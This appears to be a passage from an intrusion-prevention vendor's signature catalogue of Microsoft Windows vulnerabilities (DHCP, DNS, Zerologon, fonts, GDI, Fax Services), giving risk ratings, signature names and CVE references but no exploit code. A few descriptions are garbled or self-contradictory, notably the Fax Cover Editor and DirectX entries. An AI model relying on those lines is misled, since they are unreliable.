Situation: BOOTP_CS-Microsoft-Windows-DHCP-Server-Remote-Code-Execution
References:
CVE-2019-0725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0725
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626

About this vulnerability: A vulnerability in Microsoft Windows DHCP Server
Risk: High
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1866-5242
Platform: Windows
Software: Generic dhcp server
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability in Microsoft DHCP Server which allows remote attackers to execute arbitrary code by send a malicious DHCP request to a vulnerable server.
Situation: BOOTP_CS-Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626
References:
CVE-2019-0626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0626
Back to top

Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Improper processing of DHCPv6 messages causes memory corruption in Windows. A successful attack may allow code execution with system privileges.
Situation: Generic_UDP-Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution
References:
CVE-2019-0698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0698
Back to top

Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-380-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CSU-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
SMB-TCP_CHS-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
References:
CVE-2011-0032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0032
BID-46682
http://www.securityfocus.com/bid/46682
OSVDB-71015
http://www.osvdb.org/71015
MS11-015
http://technet.microsoft.com/security/bulletin/MS11-015
Back to top

Microsoft-Windows-DirectShow-JPEG-Double-Free

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A double free vulnerability has been reported in Microsoft Windows DirectShow. The vulnerability is due to the way DirectShow handles JPEG images. A remote attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted JPEG file. This can lead to code execution in the context of the affected user.
Situation: File-JPEG_Microsoft-Windows-DirectShow-JPEG-Double-Free
References:
CVE-2014-0301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0301
BID-66045
http://www.securityfocus.com/bid/66045
OSVDB-104316
http://www.osvdb.org/104316
MS14-013
http://technet.microsoft.com/security/bulletin/MS14-013
Back to top

Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563

About this vulnerability: A vulnerability in Microsoft Graphics Component
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in the Microsoft Graphics Component. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563
References:
CVE-2018-8563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8563
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Microsoft-Windows-DLL-Hijack-Vulnerability

About this vulnerability: DLL hijack vulnerability in Microsoft Windows.
Risk: High
First detected in: sgpkg-ips-334-4219
Last changed: sgpkg-ips-1620-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Various Windows applications suffer from a vulnerability in the way that DLL files are loaded. If a vulnerable application opens a file from a directory controlled by the attacker, the application will try to load DLL files from the same directory. This allows attackers to execute arbitrary code in vulnerable application.
Situation: HTTP_CS-Microsoft-Windows-DLL-Hijack-Vulnerability
HTTP_CSH-Microsoft-Windows-DLL-Hijack-Vulnerability
Back to top

Microsoft-Windows-DNS-Client-Buffer-Overrun

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the DNS client component of Microsoft Windows. The flaw is caused by the improper processing of crafted DNS messages. A remote attacker may leverage this vulnerability by sending crafted DNS responses to the affected service, resulting in the possible injection and execution of arbitrary code on the target system. Any injected code would be executed within the security context of the System user. In an attack case where code injection is not successful, the affected service will terminate abnormally. As the service is integral to the function of the operating system, the operating system will be shutdown. It is likely that the system will continue this behaviour after restarting, since it will attempt to use the DNS service to locate certain servers upon startup. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the SYSTEM account.
Situation: DNS-TCP_Microsoft-Windows-DNS-Client-Buffer-Overrun
DNS-UDP_Microsoft-Windows-DNS-Client-Buffer-Overrun-2
References:
CVE-2006-3441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3441
BID-19404
http://www.securityfocus.com/bid/19404
OSVDB-27844
http://www.osvdb.org/27844
MS06-041
http://technet.microsoft.com/security/bulletin/MS06-041
Back to top

Microsoft-Windows-DNS-Client-Service-CVE-2011-0657

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: Generic_UDP-Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
DNS-UDP_Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
References:
CVE-2011-0657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0657
BID-47242
http://www.securityfocus.com/bid/47242
OSVDB-71780
http://www.osvdb.org/71780
MS11-030
http://technet.microsoft.com/security/bulletin/MS11-030
Back to top

Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a DNS Cache Poisoning vulnerability in Microsoft DNS servers and clients. The vulnerability is due to insufficient transaction ID entropy in outgoing DNS queries. A remote attacker can exploit this vulnerability to poison the DNS cache by sending malicious responses to DNS requests, thereby redirecting Internet traffic to illegitimate sites. In a successful attack case, the attacker can manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
Situation: DNS-UDP_Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability
References:
CVE-2008-1447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
BID-30131
http://www.securityfocus.com/bid/30131
MS08-037
http://technet.microsoft.com/security/bulletin/MS08-037
Back to top

Microsoft-Windows-DNS-Server-Remote-Code-Execution-CVE-2020-1350

About this vulnerability: Remote code execution in Microsoft Windows Domain Name System Server services
Risk: High
First detected in: sgpkg-ips-1264-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Parsing malicious DNS messages can trigger an integer overflow in Microsoft Windows DNS Server's buffer allocations, which may lead to remote code execution in the context of the local system process.
Situation: DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Request-CVE-2020-1350
DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Response-CVE-2020-1350
References:
CVE-2020-1350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1350
Back to top

Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Windows Domain Name System Server services
Risk: High
First detected in: sgpkg-ips-103-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 Server; Windows 2000 Advanced Server; Windows 2000 Datacenter Server; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Microsoft Windows Domain Name System Server services. A crafed RPC call with a malicious string as the zone name parameter allows arbitrary code execution with the privileges of the affected service process.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-DNS-Server-RPC-Management-Interface-BOF
Generic_Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow
References:
CVE-2007-1748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748
BID-23470
http://www.securityfocus.com/bid/23470
MS07-029
http://technet.microsoft.com/security/bulletin/MS07-029
Back to top

Microsoft-Windows-DNS-Server-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a DNS Cache Poisoning vulnerability in Microsoft DNS servers. The vulnerability is due to predictable transaction ID values in outgoing DNS queries. A remote attacker can exploit this vulnerability to poison the DNS cache by sending malicious responses to DNS requests, thereby redirecting Internet traffic to illegitimate sites. In a successful attack case, the attacker can manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
Situation: Generic_UDP-Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Generic_UDP-Microsoft-Windows-DNS-Spoofing-Vulnerability
DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability-2
DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
References:
CVE-2007-3898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3898
BID-25919
http://www.securityfocus.com/bid/25919
MS07-062
http://technet.microsoft.com/security/bulletin/MS07-062
Back to top

Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Insuddicient validation of NSEC3 records in DNS responses causes a heap-based buffer overflow in Windows. A successful exploit allows arbitrary code execution.
Situation: DNS-UDP_Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow
References:
CVE-2017-11779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11779
Back to top

Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1545-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a Windows Domain Controller.
Situation: SMB-TCP_Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
MSRPC-TCP_CPS-Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
References:
CVE-2020-1472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472
Back to top

Microsoft-Windows-Domain-User-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Windows.
Situation: LDAP_CS-Microsoft-Windows-Domain-User-Code-Execution
References:
CVE-2016-3368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3368
Back to top

Microsoft-Windows-DVR-MS-CVE-2011-0042

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-380-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 7; Windows 2008 R2
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_SS-Microsoft-Windows-DVR-MS-CVE-2011-0042
SMB-TCP_Microsoft-Windows-DVR-MS-CVE-2011-0042
File-Binary_Microsoft-Windows-DVR-MS-CVE-2011-0042
References:
CVE-2011-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0042
BID-46680
http://www.securityfocus.com/bid/46680
OSVDB-71016
http://www.osvdb.org/71016
MS11-015
http://technet.microsoft.com/security/bulletin/MS11-015
Back to top

Microsoft-Windows-Els.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2012
Software: <os>
Type: Input Validation
Description: An insecure library loading vulnerability exists in Microsoft Windows esl.dll. The vulnerability is due to the way that the affected component handles the loading of dynamic link library (.DLL) files. A remote attacker could exploit this vulnerability by enticing a target user to open an Office file from an SMB or WebDAV share. Successful exploitation could result in arbitrary code execution in the security context on the target user.
Situation: File-OLE_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-TextId_Microsoft-Windows-Els.dll-Insecure-Library-Loading
References:
CVE-2015-6128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6128
MS15-132
http://technet.microsoft.com/security/bulletin/MS15-132
Back to top

Microsoft-Windows-Embedded-OpenType-Font-Engine-Lzcomp-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: An integer overflow vulnerability has been reported in Microsoft Windows Embedded OpenType (EOT) Font Engine. The vulnerability is due to insufficient validation of an integer value while processing an EOT font compressed using the LZCOMP method. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected font engine, such as Internet Explorer and Microsoft Office products. Successful exploitation of this vulnerability would result in arbitrary code execution with the privileges of the logged in user. In case of an unsuccessful attack, the application using the affected font engine would terminate abnormally.
Situation: File-Binary_MS-Windows-Embedded-OpenType-Font-Engine-Lzcomp-IOF
References:
CVE-2010-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0018
BID-37671
http://www.securityfocus.com/bid/37671
OSVDB-61651
http://www.osvdb.org/61651
MS10-001
http://technet.microsoft.com/security/bulletin/MS10-001
Back to top

Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper file handling by the Windows EOT font engine causes an information disclosure vulnerability in Windows. A successful exploit may allow an attacker to gain information for further access to the system.
Situation: File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability
References:
CVE-2018-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0855
Back to top

Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability-2

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Windows.
Situation: File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-CVE-2018-0761
References:
CVE-2018-0761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0761
Back to top

Microsoft-Windows-Event-Viewer-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability has been reported in the Windows Event Viewer.
Situation: File-TextId_Microsoft-Windows-Event-Viewer-Information-Disclosure
References:
CVE-2019-0948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0948
Back to top

Microsoft-Windows-Exchange-System-Attendant-Denial-Of-Service

About this vulnerability: Denial of Service vulnerability in Microsoft Exchange
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows 2008
Software: Exchange Server 2000; Exchange Server 2003
Type: Malfunction
Description: A denial of service vulnerability exists in the Microsoft Exchange System Attendant. The vulnerability is a result of insufficient validation when processing crafted parameters supplied to the System Attendant service. Successful exploitation of this vulnerability can allow a remote unauthenticated attacker to terminate the affected service, causing a denial of service condition. Upon triggering this vulnerability, the System Attendant service on the target server will terminate abnormally. Users may experience interruption and temporary unavailability of all services hosted by the affected process such as: address list maintenance, enforcement of message retention policies, resource monitoring, and others. To restore functionality, the affected service needs to be manually restarted.
Situation: Generic_Microsoft-Windows-Exchange-Denial-Of-Service
References:
CVE-2009-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0099
OSVDB-51838
http://www.osvdb.org/51838
MS09-003
http://technet.microsoft.com/security/bulletin/MS09-003
Back to top

Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal

About this vulnerability: A vulnerability in Microsoft Windows File Explorer
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Windows
Software: Microsoft Windows Explorer
Type: Directory Traversal
Description: A vulnerability in Microsoft Windows Explorer, in multiple versions of Microsoft Windows, which allows a remote attacker to gain sensitive information or perform arbitrary file deletion by enticing a victim into performing a file management operation on a file with a crafted name.
Situation: SMB-TCP_SS-Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal
References:
CVE-2024-49082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49082
Back to top

Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow

About this vulnerability: Denial of service vulnerability in Microsoft Windows Explorer
Risk: Moderate
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Resource Starvation
Description: Microsoft Windows Explorer has a stack exhaustion vulnerability in the handling of crafted URL files. The vulnerability can be exploited by persuading a user to open a specially crafted URL file or to place the file on the user's desktop. Opening the file leads to a termination of Windows Explorer. If a malicious file is placed on the target user's desktop, the vulnerable application will keep reading the file decreasing the usability of the Windows operating system.
Situation: HTTP_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
E-Mail_BS-Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
File-TextId_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
References:
CVE-2006-3351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3351
BID-18838
http://www.securityfocus.com/bid/18838
Back to top

Microsoft-Windows-Explorer-Web-View-Script-Execution

About this vulnerability: Script execution vulnerability in Microsoft Windows Explorer Web View
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 98; Windows 98 SE; Windows ME; Windows 2000 SP3; Windows 2000 SP4
Software: <os>
Type: Malfunction
Description: Microsoft Windows Explorer Web View component has a vulnerability in parsing the Author field in file summary information. If a user views a malicious file using the Windows Explorer Web View component, an attacker is able to execute arbitrary script code on the victim machine.
Situation: HTTP_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
E-Mail_BS-Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
File-OLE_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
References:
CVE-2005-1191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1191
BID-13248
http://www.securityfocus.com/bid/13248
MS05-024
http://technet.microsoft.com/security/bulletin/MS05-024
Back to top

Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A double free memory corruption vulnerability exists in Microsoft Windows Fax Services. Tto improper handling of Text objects while parsing Microsoft Fax cover page files. Remote this vulnerability by enticing the target user to open a specially crafted Fax cover page file.
Situation: HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
File-Binary_Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
References:
CVE-2010-4701
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4701
BID-45942
http://www.securityfocus.com/bid/45942
MS11-024
http://technet.microsoft.com/security/bulletin/MS11-024
Back to top

Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Fax Services
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows XP; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Microsoft Windows Fax Services. The vulnerability is due to insufficient validation of drawing object data while parsing Microsoft Fax cover page files. Remote attackers could exploit this vulnerability by enticing the target user to open a specially crafted fax cover page file. Successful exploitation could result in execution of arbitrary code in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-Fax-Services-Cover-Page-Heap-Buffer-Overflow
References:
CVE-2010-3974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3974
MS11-024
http://technet.microsoft.com/security/bulletin/MS11-024
Back to top

Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability has been reported in Microsoft Windows due to improper input validation when handling File Explorer Command (.scf) files. A remote attacker could exploit this vulnerability by enticing a victim into downloading a maliciously crafted file. A successful exploit could result in the disclosure of a targeted user's NTLM hashes.
Situation: File-Text_Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability
Back to top

Microsoft-Windows-File-Handling-Component-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability has been reported in Microsoft Windows. The vulnerability is caused by Windows improperly restricting the path used for processing .bat and .cmd files. By placing .bat or .cmd files on a trusted or semi-trusted network location with a malicious cmd.exe, and convincing the user to run these crafted files from the network location, an attacker can run arbitrary code as the logged-on user.
Situation: HTTP_CSH-System-File-Over-WebDAV
SMB-TCP_CHS-Microsoft-Windows-File-Handling-Component-Remote-Code-Execution
References:
CVE-2014-0315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0315
BID-66619
http://www.securityfocus.com/bid/66619
OSVDB-105534
http://www.osvdb.org/105534
MS14-019
http://technet.microsoft.com/security/bulletin/MS14-019
Back to top

Microsoft-Windows-Font-Library-File-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows. The vulnerability is due to an input validation error when the kernel parses a .FON font file. Attackers can exploit this vulnerability by enticing a user to open a malformed .fon font file. Successful exploitation of this vulnerability would result in the execution of arbitrary code within the security privileges of the Windows kernel.
Situation: File-Exe_Microsoft-Windows-Font-Library-File-Buffer-Overflow
References:
CVE-2011-2003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2003
MS11-077
http://technet.microsoft.com/security/bulletin/MS11-077
Back to top

Microsoft-Windows-Font-Library-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: An attempt to exploit a vulnerability in the font library of Microsoft Windows
Situation: File-Binary_Microsoft-Windows-Font-Library-Remote-Code-Execution
References:
CVE-2018-1013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1013
Back to top

Microsoft-Windows-Font-Parsing-CVE-2012-2897

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 8; Windows 2012; Windows RT
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-Font-Parsing-CVE-2012-2897
References:
CVE-2012-2897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2897
BID-56457
http://www.securityfocus.com/bid/56457
OSVDB-85749
http://www.osvdb.org/85749
MS12-075
http://technet.microsoft.com/security/bulletin/MS12-075
Back to top

Microsoft-Windows-GDI-Access-Violation-CVE-2011-5046

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows 2008; Windows Vista; Windows 7
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
References:
CVE-2011-5046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5046
OSVDB-77908
http://www.osvdb.org/77908
MS12-008
http://technet.microsoft.com/security/bulletin/MS12-008
Back to top

Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow

About this vulnerability: EMF file format handling vulnerability in Microsoft Windows kernel
Risk: High
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The Microsoft Windows GDI subsystem has a vulnerability in the handling of EMF and WMF images. A specially crafted image can cause memory corruption in a kernel component, allowing remote attackers to execute arbitrary code on vulnerable hosts.
Situation: E-Mail_BS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
HTTP_SS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
File-Binary_Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
References:
CVE-2009-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0081
BID-34012
http://www.securityfocus.com/bid/34012
OSVDB-52522
http://www.osvdb.org/52522
MS09-006
http://technet.microsoft.com/security/bulletin/MS09-006
Back to top

Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper handling of EMF files causes an information disclosure vulnerability in Windows. A successful exploit allows an attacker to gain access to information on the target system.
Situation: File-Binary_Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure
References:
CVE-2022-34728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34728
Back to top

Microsoft-Windows-GDI-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows GDI
Risk: Moderate
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Graphics Device Interface
Type: Malfunction
Description: A vulnerability in the Graphics Device Interface of Microsoft Windows, multiple versions, which allows remote attackers to gain sensitive information due to an improper disclosure of the contents of the memory.
Situation: File-Binary_Microsoft-Windows-GDI-Information-Disclosure
References:
CVE-2018-8596
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8596
Back to top

Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in Microsoft Graphics Device Interface (GDI) library. The flaw is due to a calculation error while handling EMF or WMF image files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted EMF or WMF image file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow-2
References:
CVE-2008-1083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1083
BID-28571
http://www.securityfocus.com/bid/28571
OSVDB-44214
http://www.osvdb.org/44214
OSVDB-44213
http://www.osvdb.org/44213
MS08-021
http://technet.microsoft.com/security/bulletin/MS08-021
Back to top

Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
